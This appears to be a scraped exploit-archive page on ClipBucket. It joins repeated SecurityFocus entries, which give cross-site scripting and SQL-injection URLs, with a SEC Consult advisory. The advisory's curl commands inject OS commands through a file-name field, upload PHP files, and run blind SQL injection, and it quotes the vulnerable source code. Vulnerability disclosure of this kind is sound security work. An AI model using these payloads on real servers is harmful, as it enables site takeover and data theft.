ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
HireHackking 
source: https://www.securityfocus.com/bid/51321/info
   
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
   
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
   
ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
HireHackking 
source: https://www.securityfocus.com/bid/51321/info
  
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
HireHackking 
source: https://www.securityfocus.com/bid/51321/info
 
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
HireHackking 
source: https://www.securityfocus.com/bid/51321/info
        
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
        
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
        
ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
HireHackking 
source: https://www.securityfocus.com/bid/51321/info

ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ClipBucket 2.6 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
HireHackking 
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
=======================================================================
              title: OS command injection, arbitrary file upload & SQL injection
            product: ClipBucket
 vulnerable version: <4.0.0 - Release 4902
      fixed version: 4.0.0 - Release 4902
         CVE number: -
             impact: critical
           homepage: http://clipbucket.com/
              found: 2017-09-06
                 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
                     Wan Ikram (Office Kuala Lumpur)
                     Fikri Fadzil (Office Kuala Lumpur)
                     Jasveer Singh (Office Kuala Lumpur)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal
                     Moscow - Munich - Kuala Lumpur - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."

Source: https://clipbucket.com/about


Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.

Users are advised to immediately install the patched version provided by the
vendor.


Vulnerability overview/description:
-----------------------------------
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a serious
vulnerability as the chances for the system to be fully compromised is very
high. This same vulnerability can also be exploited by authenticated attackers
with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.


Proof of concept:
-----------------
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:

 $ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<<COMMAND HERE>>"
http://$HOST/api/file_uploader.php


Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:

$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc
|| <<COMMAND HERE>>" "http://$HOST/actions/file_downloader.php"


2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php"

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/photo_uploader.php"

Furthermore, this vulnerability is also available to authenticated users with
basic privileges:

$ curl --cookie "[--SNIP--]" -F
"coverPhoto=@valid-image-with-appended-phpcode.php"
"http://$HOST/edit_account.php?mode=avatar_bg"


3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.

URL     : http://$HOST/actions/vote_channel.php
METHOD  : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())

The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
    $query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1
WHERE userid = {$userid}";
}else{
    //$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid =
{$userid}";
    $sel = "Select userid,username,likes From ".tbl("users")." WHERE userid =
{$userid}";
    $result = $db->Execute($sel);
     foreach ($result as $row )
        $current_likes = $row['likes'];
        $decremented_like = $current_likes-1;
     $query = "Update ".tbl("users")." Set likes = $decremented_like Where userid
= $userid";
}
[...]

URL     : http://$HOST/ajax/commonAjax.php
METHOD  : POST
PAYLOAD : mode=emailExists&email=1' or '1'='1

The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$email = $_POST['email'];
$check = $db->select(tbl('users'),"email"," email='$email'");
if (!$check) {
    echo "NO";
}
[...]

URL     : http://$HOST/ajax/commonAjax.php
METHOD  : POST
PAYLOAD : mode=userExists&username=1' or '1'='1

The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$username = $_POST['username'];
$check = $db->select(tbl('users'),"username"," username='$username'");
if (!$check) {
    echo "NO";
}
[...]


Vulnerable / tested versions:
-----------------------------
Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were
the latest at the time the security vulnerabilities were discovered.


Vendor contact timeline:
------------------------
2017-10-17: Contacting vendor through email.
2017-10-18: Vendor asking for additional details.
2017-10-19: Replied to vendor.
2017-10-26: Request update from vendor, no response.
2017-11-09: Request update from vendor.
2017-11-09: Vendor response with security patches.
2017-11-10: Notified vendor the security patches don't fix the reported issues
2017-11-30: Request update from vendor.
2017-11-30: Vendor requesting for support via Skype
2017-12-07: Response to vendor.
2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again
2018-01-22: Vendor provides latest patches, scheduled for future release
2018-01-26: Verified that the patches don't fully mitigate all issues.
2018-01-29: Request update from vendor, no response.
2018-02-06: Request update from vendor, no response.
2018-02-08: Informing vendor of public release date
2018-02-08: Vendor: Stable v4.0 including security fixes will be released in
            two weeks; postponing once again for two weeks
2018-02-23: Request update from vendor.
2018-02-26: Vendor publishes v4.0
2018-02-27: Public release of security advisory



Solution:
---------
The vendor provided the following patched version:
https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult